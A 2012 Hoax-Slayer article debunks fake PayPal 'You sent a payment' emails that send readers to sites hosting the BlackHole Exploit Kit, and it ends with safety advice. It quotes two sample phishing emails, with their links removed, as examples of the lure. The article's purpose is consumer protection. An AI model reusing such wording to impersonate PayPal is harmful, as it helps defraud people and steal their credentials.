Debunking email hoaxes and exposing Internet scams since 2003!


Hoax-Slayer Logo Hoax-Slayer Logo

DividerDivider
Home    About    New Articles    RSS Feed    Subscriptions    Contact
DividerDivider
Bookmark and Share









Issue 133 - June 2012 (2nd Edition) - Page 16

Paypal 'You Sent a Payment' Malware Emails

Issue 133 Start Menu

Previous Article            Next Article

Outline
Emails purporting to be from Paypal claim that the recipient has sent a payment to a person or vendor. The recipient is instructed to click a link to view or confirm transaction details.



Brief Analysis
The emails are not from Paypal and the claim that a payment has been sent from the recipient's account is a lie. Links in the emails open compromised websites that harbour information stealing malware.

Bookmark and Share
Detailed analysis and references below example.





Last updated: 30th May 2012
First published: 30th May 2012
Article written by Brett M. Christensen
About Brett Christensen and Hoax-Slayer


Examples
Subject: You've sent a payment

You sent a payment Transaction ID: 4BK71319AT361831A

Dear PayPal Customer,
You sent a payment for 931.09 AUD to Ray [Surname Removed].

Please note that it may take a little while for your payment to appear in the Recent Activity list on your Account Overview. View the details of this transaction online

Your monthly account statement is available anytime; just log in to your account at [link removed]. To correct any errors, please contact us through our Help Centre at
[Link Removed]

Amount: 931.09 AUD
Sent on: 30 May 2012
Payment method Credit Card Payment
Kind regards,
PayPal

Paypal Malware Email 1


Subject: Receipt for your payment to AVG

Hello Member,

You sent a payment of 90.00 USD to AVG.

This charge will appear on your credit card statement as payment to PAYPAL *AVGANTS

Seller AVG Technologies

Note to seller You haven't included a note

. Description Unit price Qty Amount

AVG Anti-Virus 2012 45.00 USD 2 45.00 USD
Shipping and handling 0.00 USD
Tax 0.00 USD

Total 90.00 USD

________________________________________
Do you confirm this payment?
If this payment was not made by you please immediately take the following steps:

* Login to your account by clicking on the link below :
* Provide requested information to ensure you are the owner of the account
* After you did the previous steps the order will be cancelled.
* We will refund your money to you and the payment will deleted from transactions history.

CANCEL TRANSACTION!

Paypal Malware Email 2




Detailed Analysis
According to these fraudulent emails, the recipient has recently sent a substantial payment via his or her Paypal account. Details in the scam emails vary, with some claiming that the money has been sent to purchase software or other items while others claim that the money has been sent directly to a named individual.

The messages are designed to look like genuine Paypal emails and include seemingly genuine Paypal logos and formatting. The emails use spoofed addresses to make it appear that they have been sent from Paypal.com.

However, the emails are not from Paypal and the claims that the recipient has sent a payment via Paypal are untrue. In fact, all links in the bogus emails open compromised websites that firstly ask the user to wait while the page finishes loading. However, the Paypal website will not load as the user expects. Instead, the page will automatically redirect the visitor to another website that contains a version of the Blackhole Exploit Kit. BlackHole is a web application used by criminals to exploit browser vulnerabilities as a means of downloading and installing trojans and other types of malware.

The criminals responsible for this operation hope that at least a few recipients will be panicked into clicking the links in the bogus emails in the mistaken belief that their Paypal account or credit card has been compromised. If a recipient does fall for the ruse, and follow one of the links, a trojan may be downloaded and installed on his or her computer. This trojan may monitor web browser use and collect usernames and passwords including online banking login details. This information can then be sent back to the criminals.

Online criminals have recently carried out a number of similar attacks with the aim of fooling users into visiting websites that host the BlackHole Exploit Kit. At the time of writing, bogus Verizon Wireless bills that lead to Blackhole Exploit Kit sites continue to be distributed. Earlier in 2012, a series of malware emails purporting to be airline flight confirmation messages again pointed recipients to compromised sites that harboured BlackHole. And, in December 2011, fake Amazon.com order notifications were distributed that also contained links to BlackHole websites.

BlackHole is a widely used criminal toolkit and such attacks are likely to continue. Be very cautious of clicking links in emails, even if they appear to be legitimate. Some such attacks are quite sophisticated and it may be difficult - at least without careful examination - to tell the difference between a bogus email and a genuine notification. Rather than click on email links, it is safer to open your browser and go to the service provider's website directly by entering the web address. And, of course, always ensure that you have installed the latest security updates for your browser and operating system and have up-to-date antivirus and anti-malware protection on your computer.

Bookmark and Share

References
BlackHole Exploit Kit
PayPal Payment Notification leads to Blackhole Exploit Kit
Bogus Verizon Wireless Bill Email Points to Malware
US Airways 'Flight Confirmation' Malware Emails
Bogus Amazon Shipping Confirmation Emails Point To Malware

Previous Article            Next Article

Issue 133 Start Menu

Pages in this issue:
  1. Facebook Will Donate for 'Likes' Hoax - Isabella Abused Wife Message
  2. The Croc Whisperer
  3. Irish Friendship Wish Chain Letter
  4. Can Birds Die From Eating Discarded Gum?
  5. Qian Hongyan AOL Money For Forwarding Hoax
  6. Foursquare 'Friend Request Approved' Pharmacy Spam
  7. Hitman Payoff Scam Email
  8. LinkedIn User Passwords Stolen - Change Your LinkedIn Password Immediately
  9. Hoax: Facebook to Start Charging This Summer - Facebook Icon Will Turn Blue ( Or Gold)
  10. Useless Warning - Facebook Will Start Using Your Photos in Ads on Friday
  11. Completely Pointless and Misleading 'Facebook Privacy Notice'
  12. Black Lion Facebook Hoax
  13. 'Switch to Pink Facebook' Survey Scam
  14. Satanist Friend Request Facebook Warning
  15. Nine Zero Hash Phone Scam Hoax
  16. Paypal 'You Sent a Payment' Malware Emails
  17. FedEx Incorrect Delivery Address Malware Email